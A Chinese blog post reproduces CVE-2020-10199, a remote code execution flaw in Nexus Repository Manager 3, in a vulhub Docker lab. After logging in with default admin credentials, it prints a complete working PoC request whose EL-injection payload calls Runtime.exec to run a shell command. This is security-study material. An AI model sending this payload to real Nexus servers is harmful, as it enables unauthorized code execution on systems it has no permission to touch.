NEXUS CVE-2020-10199漏洞复现

已于 2023-08-25 11:30:57 修改
阅读量163 收藏 1
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: web 网络安全
于 2023-08-16 03:15:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MDSEC/article/details/132310290
版权

漏洞名称
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)

漏洞简述
​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 此漏洞的利用需要攻击者具备任意类型的账号权限。

影响版本
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
漏洞复现

在kail虚拟机上打开命令控制台,切换到vulhub目录下的nexus,ls查看nexus下的目录,cd切换到复现的CVE-2020-10199,执行docker-compose up - d,拉去镜像环境

docker-compose up -d 
#拉取镜像环境

 

然后ipconfig 

 

 

 然后访问网址,尝试用弱口令账号:admin,密码:admin ,登录界面

登录后开启代理用bp抓包

 

抓包后发送到repeater,执行poc,注意修改ip,token和cookie

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.182.131:8081
Content-Length: 292
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.2696582112427013
Content-Type: application/json
Accept: */*
Origin: http://192.168.182.131:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://192.168.182.131:8081/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:NX-ANTI-CSRF-TOKEN=0.2696582112427013; NXSESSIONID=462d53af-f3ac-48cd-a6fd-d38880553236
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]
  }
}

 payload为:

"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"

在虚拟机上查看是否执行成功

147为docker ps命令执行后的status前三位

                                                                                          微信公众号:猫蛋儿安全 

MDSEC
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199
zyl404的博客
01-26 2099
漏洞名称 Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199漏洞简述 ​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现
ierciyuan的博客
08-01 1088
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现。测试漏洞并反弹shell。
vulhub-nexus-cve-2020-10199
Ronin_qianmo的博客
07-28 187
1、漏洞描述 Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。 2、登录网址 http://x.x.x.x:8081 3、登录账户 默认登录的用户名和密码是admin/admin123 4、找到漏洞 5、复制当前网页cookie中的CSRF Token6、登录后抓包,获取当前用户的cookie,把cookie中的CSRF Token都替换了7、进入doc
nexus 远程代码执行 (CVE-2020-10199
m0_60716947的博客
12-20 1063
nexus 远程代码执行 (CVE-2020-10199
[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
公众号shadow sock7
04-02 6085
参考 https://support.sonatype.com/hc/en-us/articles/360044882533 https://mp.weixin.qq.com/s/xUWPVwcNL6n6snn_gV_UwA 漏洞描述 XSS就算了。 RCE: an attacker with any type of account on NXRM to execute arbitrary ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
Nexus远程命令执行CVE-2020-10199
Adminxe的博客
12-03 1121
0x01 漏洞描述 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。   Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。   在 Nexus Repository Manager OSS/Pro 3.21.1 及..
CVE-2020-10199: Nexus Repository Manager代码执行通告
爱国小白帽
04-02 1405
CVE-2020-10199: Nexus Repository Manager代码执行通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x 的远程代码执行漏洞通告。在...
CVE-2020-10199 远程命令执行漏洞
m0_46580995的博客
07-23 2666
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199) 其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞复现环境 vulhub 复现漏洞首先要知道用户名和密码,vulhub已经给出 admin/admin 使用msf5搜索exp CVE-2020-10199 use exp查看选项 show options x需要配置Rhost,Lhost ,password和port check一下 目标脆弱可以run ls ...
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1636
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199复现
ximo的博客
03-25 519
简介 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。 影响版本 Nexus Repository Manager OSS/Pro 3.x <= 3.21.1 环境搭建 docker环境+vulhub。 git clone https://github.com/vulhub/vulhub.git 启动环境后,访问 ip:8081 : 漏洞复现 使用账号密码adm
nexus 远程代码执行 (CVE-2020-10199/CVE-2020-10204)
小小猪的博客
12-28 1759
nexus 远程代码执行 (CVE-2020-10199/CVE-2020-10204) 漏洞介绍: Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的 影响版本: Nexus Repository Manager OSS/Pro 3.x <= 3.21.1 环境搭建:
Tomact_CVE-2020-1938漏洞复现
最新发布
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值